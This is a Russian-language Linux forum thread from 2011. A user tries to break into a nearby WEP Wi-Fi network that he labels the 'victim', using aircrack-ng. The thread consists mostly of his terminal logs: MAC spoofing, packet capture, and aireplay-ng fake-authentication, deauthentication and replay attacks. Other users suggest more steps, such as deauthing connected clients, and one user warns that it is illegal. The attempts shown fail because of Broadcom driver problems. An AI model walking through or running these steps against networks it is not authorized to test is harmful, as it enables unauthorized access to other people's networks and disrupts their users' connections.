LINUX.ORG.RU
ФорумSecurity

Взлом WiFi с помощю aircrack-ng?


1

4

консоль 1: 

#XX:XX:XX:XX:XX:XX - мой мак
#XX:XX:XX:XX:XX:X1 - мой айфон (неисползуетса)
#XX:XX:XX:XX:XX:X2 - жертва
#d6:ee:41:69:48:cf - фейк
root@adr-laptop:/home/adr# airmon-ng start wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
929	NetworkManager
930	avahi-daemon
931	avahi-daemon
4214	dhclient
4756	wpa_supplicant


Interface	Chipset		Driver

wlan0		Unknown 	brcmsmac - [phy0]
				(monitor mode enabled on mon0)

root@adr-laptop:/home/adr# ifconfig mon0 down
root@adr-laptop:/home/adr# macchanger -r mon0
Permanent MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
Current   MAC: XX:XX:XX:XX:XX:XX (Hon Hai Precision Ind. Co.,ltd.)
New       MAC: d6:ee:41:69:48:cf (unknown)
root@adr-laptop:/home/adr# ifconfig mon0 up
root@adr-laptop:/home/adr# airodump-ng mon0

 CH  1 ][ Elapsed: 16 s ][ 2011-11-06 13:51                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X1   -1      101        0    0   6  36 . OPN              iPhone-ADR MyWi   
 XX:XX:XX:XX:XX:X2  -87        3        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                             
 XX:XX:XX:XX:XX:X1  XX:XX:XX:XX:X1  -30    0 -12     22      101         
                  
#ctrl + c

root@adr-laptop:/home/adr# airodump-ng mon0 -c 3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out

 CH  3 ][ Elapsed: 16 s ][ 2011-11-06 13:53 ][b][ fixed channel mon0: -1[/b]                       
                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID         
                                                                                            
 XX:XX:XX:XX:XX:X2  -87   8       27        0    0   3  54e. WEP  WEP         Baze          
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe   
 
#ctrl + c

root@adr-laptop:/home/adr# airodump-ng mon0 -c 3,3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out

 CH  3 ][ Elapsed: 8 s ][ 2011-11-06 13:54                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X2  -86       14        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
 
 
#run aireplay-ng

CH  3 ][ Elapsed: 2 mins ][ 2011-11-06 13:56                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 XX:XX:XX:XX:XX:X2  -86      246        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                            
 XX:XX:XX:XX:XX:X2  D6:EE:41:69:48:CF    0    0 - 1      0       12
консоль 2: 

root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:22  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1
13:56:22  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@adr-laptop:/home/adr# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:X2 -e Baze mon0 --ignore-negative-one
No source MAC (-h) specified. Using the device MAC (D6:EE:41:69:48:CF)
13:56:31  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:X2) on channel -1

13:56:31  Sending Authentication Request (Open System)

13:56:33  Sending Authentication Request (Open System)

13:56:35  Sending Authentication Request (Open System)

13:56:37  Sending Authentication Request (Open System)

13:56:39  Sending Authentication Request (Open System)

13:56:41  Sending Authentication Request (Open System)

13:56:43  Sending Authentication Request (Open System)

13:56:45  Sending Authentication Request (Open System)

13:56:47  Sending Authentication Request (Open System)

13:56:49  Sending Authentication Request (Open System)

13:56:51  Sending Authentication Request (Open System)

13:56:53  Sending Authentication Request (Open System)

13:56:55  Sending Authentication Request (Open System)

13:56:57  Sending Authentication Request (Open System)

13:56:59  Sending Authentication Request (Open System)

13:57:01  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@adr-laptop:/home/adr#

система 

root@adr-laptop:/home/adr# lspci | grep -i net
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E/RTL8102E PCI Express Fast Ethernet controller (rev 02)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

root@adr-laptop:/home/adr# ifconfig
eth2      Link encap:Ethernet  HWaddr XX:XX:XX:XX:X1 #айфон  
          inet addr:192.168.21.7  Bcast:192.168.21.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:5bff:fe59:d74c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:30047 errors:0 dropped:1 overruns:0 frame:0
          TX packets:32494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18590227 (18.5 MB)  TX bytes:5893094 (5.8 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4493 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4493 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:356204 (356.2 KB)  TX bytes:356204 (356.2 KB)

mon0      Link encap:UNSPEC  HWaddr D6-EE-41-69-48-CF-30-30-00-00-00-00-00-00-00-00  
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:14599 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2061943 (2.0 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr XX:XX:XX:XX:XX
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


root@adr-laptop:/home/adr# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=19 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth2      no wireless extensions.

mon0      IEEE 802.11bgn  Mode:Monitor  Tx-Power=19 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

root@adr-laptop:/home/adr# airdriver-ng detect

Found "Broadcom 4300" device: (bcm43xx)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

Found "Broadcom 4300" device: (bcm43xx-mac80211)
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)


USB devices (generic detection):
Bus 002 Device 003: ID 04fc:05d8 Sunplus Technology Co., Ltd Wireless keyboard/mouse

PCI devices (generic detection):
03:00.0 Network controller: Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01)

root@adr-laptop:/home/adr# uname -a
Linux adr-laptop 3.0.0-12-generic-pae #20-Ubuntu SMP Fri Oct 7 16:37:17 UTC 2011 i686 i686 i386 GNU/Linux

#ОС Ubuntu 11.10

пітаюсь убить то што мешает... 

root@adr-laptop:/home/adr# airmon-ng start


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
[b]929	NetworkManager
930	avahi-daemon
931	avahi-daemon
4214	dhclient
4756	wpa_supplicant[/b]

root@adr-laptop:/home/adr# service network-manager stop
network-manager stop/waiting
root@adr-laptop:/home/adr# kill 930 931 4214 4756
root@adr-laptop:/home/adr# airmon-ng start


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
[b]6835	avahi-daemon
6836	avahi-daemon[/b]


usage: airmon-ng <start|stop|check> <interface> [channel or frequency]

дальше повторються первые два листинга .. (ничего не изменилось)



Последнее исправление: ADR (всего исправлений: 2)

> 6835 avahi-daemon
service avahi-daemon stop, очевидно

дальше повторються первые два листинга ..

Другие типы атак пробовали?

AITap ★★★★★
()
Ответ на: комментарий от AITap

также... [code] 14:48:13 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX) on channel -1 [/code]

нет... можно описание?

[code] #test #консоль1 CH 3 ][ Elapsed: 7 mins ][ 2011-11-06 14:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:15:6D:FA:89:F0 -88 688 0 0 3 54e. WEP WEP Baze BSSID STATION PWR Rate Lost Frames Probe 00:15:6D:FA:89:F0 00:9D:9C:F1:9C:D4 0 0 - 1 323 4 00:15:6D:FA:89:F0 00:CD:7B:08:6E:00 0 0 - 1 327 4 00:15:6D:FA:89:F0 00:59:76:30:B6:1A 0 0 - 1 331 4 00:15:6D:FA:89:F0 00:85:AC:71:DE:7E 0 0 - 1 335 4 00:15:6D:FA:89:F0 00:44:F6:16:26:23 0 0 - 1 339 4 00:15:6D:FA:89:F0 00:A9:06:96:23:02 0 0 - 1 343 4 00:15:6D:FA:89:F0 00:2E:F1:FF:38:4E 0 0 - 1 347 4 00:15:6D:FA:89:F0 00:C5:EE:A0:85:95 0 0 - 1 351 4 00:15:6D:FA:89:F0 00:98:B2:5C:A4:9D 0 0 - 1 355 4 00:15:6D:FA:89:F0 00:86:4E:59:D2:E8 0 0 - 1 359 4 00:15:6D:FA:89:F0 00:D2:13:E2:2D:6F 0 0 - 1 363 4 00:15:6D:FA:89:F0 00:CE:47:7A:FC:AE 0 0 - 1 367 4 00:15:6D:FA:89:F0 00:6C:69:0A:5D:AA 0 0 - 1 371 4 00:15:6D:FA:89:F0 00:4A:03:C0:A7:8D 0 0 - 1 375 4

#консоль2 root@adr-laptop:/home/adr# aireplay-ng -9 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. 14:55:16 Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1 14:55:18 Trying broadcast probe requests... 14:55:20 No Answer... 14:55:20 Found 1 AP

14:55:20 Trying directed probe requests... 14:55:20 00:15:6D:FA:89:F0 - channel: 0 - 'Baze' 14:55:26 0/30: 0%

[/code] другие на airodump-ng не действуют ... если ты об этом?

[code] root@adr-laptop:/home/adr# aireplay-ng -0 10 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one 14:51:21 Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 14:51:21 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:22 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:22 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:23 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:23 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:24 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:24 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:25 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:25 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] 14:51:25 Sending DeAuth to broadcast — BSSID: [00:15:6D:FA:89:F0] root@adr-laptop:/home/adr# man aireplay-ng man: can't resolve /usr/share/man/man1//usr/share/man/man1/aireplay-ng.1.gz: No such file or directory root@adr-laptop:/home/adr# aireplay-ng -2 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) ^Cad 341 packets... root@adr-laptop:/home/adr# aireplay-ng -3 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) 14:52:39 Waiting for beacon frame (ESSID: Baze) on channel -1 Found BSSID «00:15:6D:FA:89:F0» to given ESSID «Baze». Saving ARP requests in replay_arp-1106-145242.cap You should also start airodump-ng to capture replies. ^Cad 360 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps) root@adr-laptop:/home/adr# aireplay-ng -4 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. 14:53:23 Waiting for beacon frame (ESSID: Baze) on channel -1 Found BSSID «00:15:6D:FA:89:F0» to given ESSID «Baze». ^Cad 170 packets... root@adr-laptop:/home/adr# aireplay-ng -5 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) 14:53:47 Waiting for beacon frame (ESSID: Baze) on channel -1 Found BSSID «00:15:6D:FA:89:F0» to given ESSID «Baze». 14:53:47 Waiting for a data packet... ^Cad 83 packets... root@adr-laptop:/home/adr# aireplay-ng -6 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) 14:54:03 Waiting for beacon frame (ESSID: Baze) on channel -1 Found BSSID «00:15:6D:FA:89:F0» to given ESSID «Baze». Saving ARP requests in replay_arp-1106-145404.cap You should also start airodump-ng to capture replies. ^Cad 144 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps) root@adr-laptop:/home/adr# aireplay-ng -7 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) ^Cad 215 packets... root@adr-laptop:/home/adr# aireplay-ng -8 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one ioctl(RTC_IRQP_SET) failed: Invalid argument Make sure enhanced rtc device support is enabled in the kernel (module rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'. No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9) 14:54:57 Waiting for beacon frame (ESSID: Baze) on channel -1 Found BSSID «00:15:6D:FA:89:F0» to given ESSID «Baze». Saving ARP requests in replay_arp-1106-145458.cap You should also start airodump-ng to capture replies. Remember to filter the capture to only keep WEP frames: «tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap» ^Cad 96 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps)

root@adr-laptop:/home/adr# echo 1024 >/proc/sys/dev/rtc/max-user-freq bash: /proc/sys/dev/rtc/max-user-freq: No such file or directory [/code]

ADR
() автор топика

Там какая-то проблема с броадкомовской карточкой. У себя решал вроде бы iwconfig’ом и настройкой wlan0 на нужный канал, точно не помню.

Проще забить на aireplay и только ловить пакеты airodump’ом. Главное поймать момент аутентификации. А, и собирать лучше вечером, когда трафик идет.

alius-miles
()
Ответ на: комментарий от ADR

man aireplay-ng, Attack modes.

-0 наиболее полезна, ибо заставляет всех клиентов отсоединится, давая вожможность airodump’у поймать пакеты аутентификации.

alius-miles
()
Ответ на: комментарий от AITap

также... 

14:48:13  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX) on channel -1

нет... можно описание? 

#test
#консоль1
 CH  3 ][ Elapsed: 7 mins ][ 2011-11-06 14:55                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID             
                                                                                            
 00:15:6D:FA:89:F0  -88      688        0    0   3  54e. WEP  WEP         Baze              
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                            
 00:15:6D:FA:89:F0  00:9D:9C:F1:9C:D4    0    0 - 1    323        4                          
 00:15:6D:FA:89:F0  00:CD:7B:08:6E:00    0    0 - 1    327        4                          
 00:15:6D:FA:89:F0  00:59:76:30:B6:1A    0    0 - 1    331        4                          
 00:15:6D:FA:89:F0  00:85:AC:71:DE:7E    0    0 - 1    335        4                          
 00:15:6D:FA:89:F0  00:44:F6:16:26:23    0    0 - 1    339        4                          
 00:15:6D:FA:89:F0  00:A9:06:96:23:02    0    0 - 1    343        4                          
 00:15:6D:FA:89:F0  00:2E:F1:FF:38:4E    0    0 - 1    347        4                          
 00:15:6D:FA:89:F0  00:C5:EE:A0:85:95    0    0 - 1    351        4                          
 00:15:6D:FA:89:F0  00:98:B2:5C:A4:9D    0    0 - 1    355        4                          
 00:15:6D:FA:89:F0  00:86:4E:59:D2:E8    0    0 - 1    359        4                          
 00:15:6D:FA:89:F0  00:D2:13:E2:2D:6F    0    0 - 1    363        4                          
 00:15:6D:FA:89:F0  00:CE:47:7A:FC:AE    0    0 - 1    367        4                          
 00:15:6D:FA:89:F0  00:6C:69:0A:5D:AA    0    0 - 1    371        4                          
 00:15:6D:FA:89:F0  00:4A:03:C0:A7:8D    0    0 - 1    375        4      


#консоль2
root@adr-laptop:/home/adr# aireplay-ng -9 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
14:55:16  Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1
14:55:18  Trying broadcast probe requests...
14:55:20  No Answer...
14:55:20  Found 1 AP 

14:55:20  Trying directed probe requests...
14:55:20  00:15:6D:FA:89:F0 - channel: 0 - 'Baze'
14:55:26   0/30:   0%

другие на airodump-ng не действуют ... если ты об этом?

root@adr-laptop:/home/adr# aireplay-ng -0 10 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
14:51:21  Waiting for beacon frame (BSSID: 00:15:6D:FA:89:F0) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:51:21  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:22  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:22  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:23  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:23  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:24  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:24  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
14:51:25  Sending DeAuth to broadcast -- BSSID: [00:15:6D:FA:89:F0]
root@adr-laptop:/home/adr# man aireplay-ng
man: can't resolve /usr/share/man/man1//usr/share/man/man1/aireplay-ng.1.gz: No such file or directory
root@adr-laptop:/home/adr# aireplay-ng -2 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
^Cad 341 packets...
root@adr-laptop:/home/adr# aireplay-ng -3 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:52:39  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145242.cap
You should also start airodump-ng to capture replies.
^Cad 360 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
root@adr-laptop:/home/adr# aireplay-ng -4 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
14:53:23  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
^Cad 170 packets...
root@adr-laptop:/home/adr# aireplay-ng -5 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:53:47  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
14:53:47  Waiting for a data packet...
^Cad 83 packets...
root@adr-laptop:/home/adr# aireplay-ng -6 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:54:03  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145404.cap
You should also start airodump-ng to capture replies.
^Cad 144 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps)
root@adr-laptop:/home/adr# aireplay-ng -7 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
^Cad 215 packets...
root@adr-laptop:/home/adr# aireplay-ng -8 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
No source MAC (-h) specified. Using the device MAC (5E:4B:67:EF:56:F9)
14:54:57  Waiting for beacon frame (ESSID: Baze) on channel -1
Found BSSID "00:15:6D:FA:89:F0" to given ESSID "Baze".
Saving ARP requests in replay_arp-1106-145458.cap
You should also start airodump-ng to capture replies.
Remember to filter the capture to only keep WEP frames:  "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"
^Cad 96 packets (0 ARPs, 0 ACKs), sent 0 packets...(0 pps)

root@adr-laptop:/home/adr# echo 1024 >/proc/sys/dev/rtc/max-user-freq
bash: /proc/sys/dev/rtc/max-user-freq: No such file or directory
ADR
() автор топика
Ответ на: комментарий от zhekas

а как проверить на каком канале карта? iwconfig что то не хочет ее фиксировать ...

ADR
() автор топика
Ответ на: комментарий от ADR

> root@adr-laptop:/home/adr# aireplay-ng -0 10 -a 00:15:6D:FA:89:F0 -e Baze mon0 --ignore-negative-one

NB: this attack is more effective when targeting

a connected wireless client (-c <client's mac>).

Укажите MAC-адрес жертвы-клиента,

Насчёт остальных видов атак почитайте: http://linux.die.net/man/1/aireplay-ng

Все они, естественно, имеют смысл только в том случае, если к AP подключены клиенты (а большинство из них ещё требует какого-либо обмена данными с AP).

AITap ★★★★★
()
Ответ на: комментарий от alius-miles

уже два дня(( 

root@adr-laptop:/home/adr/wifiCrack# aircrack-ng -n 128 -b 00:15:6D:FA:89:F0 Baze.out-*.cap
Opening Baze.out-01.cap
Opening Baze.out-02.cap
Opening Baze.out-03.cap
Opening Baze.out-04.cap
Opening Baze.out-05.cap
Opening Baze.out-06.cap
Opening Baze.out-07.cap
Opening Baze.out-08.cap
Got no data packets from target network!


Quitting aircrack-ng...

ADR
() автор топика
Ответ на: комментарий от ADR

При таком количестве подключенных клиентов совсем не поймать пакетов (#Data) — весьма странно.

Попробуй:

ifconfig wlan0 down

сменить мак

iwconfig wlan0 channel 3

ifconfig wlan0 up

airmon-ng start wlan0 3

запустить airodump
запустить aireplay -0 с ключём -с [мак присоединенного клиента]


alius-miles
()
Ответ на: комментарий от alius-miles

хм ... а где пишет о клентам?? разве не внизу должны быть? а там только айфон и я ...

был в гостях пытался авторизоваться (aireplay-ng -1 0) на вайфай с WPA2 

No source MAC (-h) specified. Using the device MAC (XX:XX:XX:XX:XX:XX)
19:37:44  Waiting for beacon frame (BSSID: YY:YY:YY:YY:YY:YY) on channel -1

19:37:44  Sending Authentication Request (Open System)

19:37:46  Sending Authentication Request (Open System)
19:37:46  Authentication successful
19:37:46  Sending Association Request
19:37:46  Denied (code 12), wrong ESSID or WPA ?

19:37:49  Sending Authentication Request (Open System)
19:37:49  Authentication successful
19:37:49  Sending Association Request
19:37:49  Denied (code 12), wrong ESSID or WPA ?
т.е. все норм (авторизация проходит), а у меня сигнал слаб? но это шло через раз ... раз авторизуется раз нет. (я менял мак, перезапускав mon0 ...) от чего это может зависеть? (авторизувася был на родном мака)

ADR
() автор топика
Ответ на: комментарий от ADR

эти «клиенты» появились после aireplay-ng -9 (тест)

ADR
() автор топика

Кулхацкеры в треде, все в машину!
ТС, не советую тебе что-либо ломать, это как минимум незаконно.

CYB3R ★★★★★
()

http://www.aircrack-ng.org Поиск в форуме по запросу «fixed channel mon0: - 1». Там же ищем патч для своего броадкома. Всё патчим-компилим..... ПРОФИТ!!! Подробностей не будет т.к. пишу с КПК.

FatPinguin
()
Ответ на: комментарий от ADR

Внизу, столбец STATION — список подключенных клиентов. Если есть клиенты и собирает Beacons — должно ловить Data. Если нет — хз. Смотри форум aircraсk’а.

alius-miles
()
Ответ на: комментарий от FatPinguin

зделал! нету у меня больше драйверов(( комплилю вручную: 

adr@adr-laptop:/usr/src/bcmwl-5.100.82.38+bdcom$ sudo make
KBUILD_NOPEDANTIC=1 make -C /lib/modules/`uname -r`/build M=`pwd`
make[1]: Вхожу у каталог "/usr/src/linux-headers-3.0.0-12-generic-pae"
  CC [M]  /usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.o
/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.c: In function ‘wl_attach’:
/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.c:485:3: error: implicit declaration of function ‘init_MUTEX’ [-Werror=implicit-function-declaration]
cc1: some warnings being treated as errors

make[2]: *** [/usr/src/bcmwl-5.100.82.38+bdcom/src/wl/sys/wl_linux.o] Помилка 1
make[1]: *** [_module_/usr/src/bcmwl-5.100.82.38+bdcom] Помилка 2
make[1]: Залишаю каталог "/usr/src/linux-headers-3.0.0-12-generic-pae"
make: *** [all] Помилка 2
adr@adr-laptop:/usr/src/bcmwl-5.100.82.38+bdcom$

ADR
() автор топика
Ответ на: комментарий от ADR

не знаю почему вайфай снова заработал)

правда предыдущий патч хоть и смог зафиксировать канал но это ничего не дало ...

root@adr-laptop:~# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -e Baze mon0 
